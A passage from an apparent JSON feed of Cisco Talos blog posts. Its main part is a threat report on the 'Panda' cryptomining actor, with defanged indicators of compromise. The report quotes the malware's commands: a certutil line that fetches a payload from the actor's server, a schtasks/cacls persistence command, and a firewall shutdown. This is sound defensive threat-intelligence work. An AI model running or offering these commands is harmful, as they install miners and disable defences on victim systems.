the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "type": "talosblog", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[![](https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s640/image4.png)](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[![](https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s640/image6.png)](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[![](https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s640/image5.png)](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[![](https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s640/image8.png)](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[![](https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s640/image7.png)](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[![](https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s640/image1.png)](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[![](https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s640/image3.png)](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[![](https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png)](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/3w3NM3N6VuY)", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-12T15:23:07", "description": "_This blog post was authored by Benny Ketelslegers of Cisco Talos_ \n_ \n_The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to [cryptocurrency miners](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>). Talos researchers identified APT campaigns including [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), predominantly affecting small business and home office networking equipment, as well as [Olympic Destroyer](<https://blog.talosintelligence.com/2018/02/olympic-destroyer.html>), apparently designed to disrupt the Winter Olympics. \n \nBut these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORT\u24c7 rules as reported by [Cisco Meraki](<https://meraki.cisco.com/>) systems. These rules protected our customers from some of the most common attacks that, even though they aren't as widely known, could be just as disruptive as something like Olympic Destroyer. Snort is a free, open-source network intrusion prevention system. Cisco Talos provides new rule updates to Snort every week to protect against software vulnerabilities and the latest malware. \n \n \n\n\n### Top 5 Rules\n\n \nSnort rules trigger on network behavior ranging from attempts to probe networked systems, attempts at exploiting systems, to detecting known malicious command and control traffic. Each rules detects specific network activity, and each rules has a unique identifier. This identifier is comprised of three parts. The Generator ID (GID), the rule ID (SID) and revision number. The GID identifies what part of Snort generates the event. For example, \"1\" indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search tool on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule. Be sure to use the latest revision of any rule. \n \nSnort rules are classified into different classes based on the type of activity detected with the most commonly reported class type being \"policy-violation\" followed by \"trojan-activity\" and \"attempted-admin.\" Some less frequently reported class types such as \"attempted user\" and \"web-application-attack\" are particularly interesting in the context of detecting malicious inbound and outbound network traffic. \n \nCisco Meraki-managed devices protect clients networks and give us an overview of the wider threat environment. These are the five most triggered rules within policy, in reverse order. \n \n\n\n#### No. 5: 1:43687:2 \"suspicious .top dns query\"\n\n \nThe .top top-level domain extension is a generic top level domain and has been observed in malware campaigns such as the [Angler exploit kit](<https://blog.talosintelligence.com/2016/03/angler-slips-hook.html>) and the [Necurs botnet](<https://blog.talosintelligence.com/2018/01/the-many-tentacles-of-necurs-botnet.html>). This top-level domain can be bought as cheap as 1 USD and is the reason it is very popular with cybercriminals for their malware and phishing campaigns. \n \nThis signature triggers on DNS lookups for .top domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \n\n\n#### No. 4: 1:41978:5 \"Microsoft Windows SMB remote code execution attempt\"\n\n \nIn May 2017, a [vulnerability](<https://www.us-cert.gov/ncas/current-activity/2017/03/16/Microsoft-SMBv1-Vulnerability>) in SMBv1 was published that could allow remote attackers to execute arbitrary code via crafted packets. This led to the outbreak of the network worms [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [Nyetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) in 2017. Although it did not make our top five rules in 2017, it seems there was still a lot scanning or attempts to exploit this vulnerability in 2018. This shows the importance of network defenses and patching management programs as often as possible. \n \nOrganizations should ensure that devices running Windows are fully patched. Additionally, they should have SMB ports 139 and 445 blocked from all externally accessible hosts. \n \n\n\n#### No. 3: 1:39867:4 \"Suspicious .tk dns query\"\n\n \nThe .tk top-level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the most prolific in terms of the number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers. \n \nThis rule triggers on DNS lookups for .tk domains. Such a case doesn't necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers. \n \nOther, similar rules detecting DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules. \n \n\n\n#### No. 2: 1:35030:1 & 1:23493:6 \"Win.Trojan.Zeus variant outbound connection\"\n\n \nHistorically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide. \n \nIn the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM). \n \nThis vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post. Ukrainian authorities and businesses were alerted by local security firm (ISSP) that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign. \n \nEver since the source code of Zeus leaked in 2011, we have seen various variants appear such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>) which poisoned Google Search results in order to spread. \n \n\n\n#### No. 1: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" & \"1:45549:4 PUA-OTHER XMRig cryptocurrency mining pool connection attempt\"\n\n \nOver the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat Cryptocurrency mining threats and this rule deployed in early 2018, proved to be the number 1 showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often observed triggered Snort rule in 2018. \n \nCryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization. \n \nFor an overview of all related snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>). \n \n\n\n \n\n\n[![](https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s640/012419-Snort-Sigs-Blog-outbound-connection-attempt.png)](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from external to internal (inbound), from the internal to external (outbound) interfaces or depending on the architecture of your environment the traffic can avoid being filtered by a firewall or inspected by an IPS/IDS device; this will generally be your local/internal traffic on the same layer2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn, were more frequent than inbound with ratios of approximately 6.9 to 1. The profile of the alerts are different for 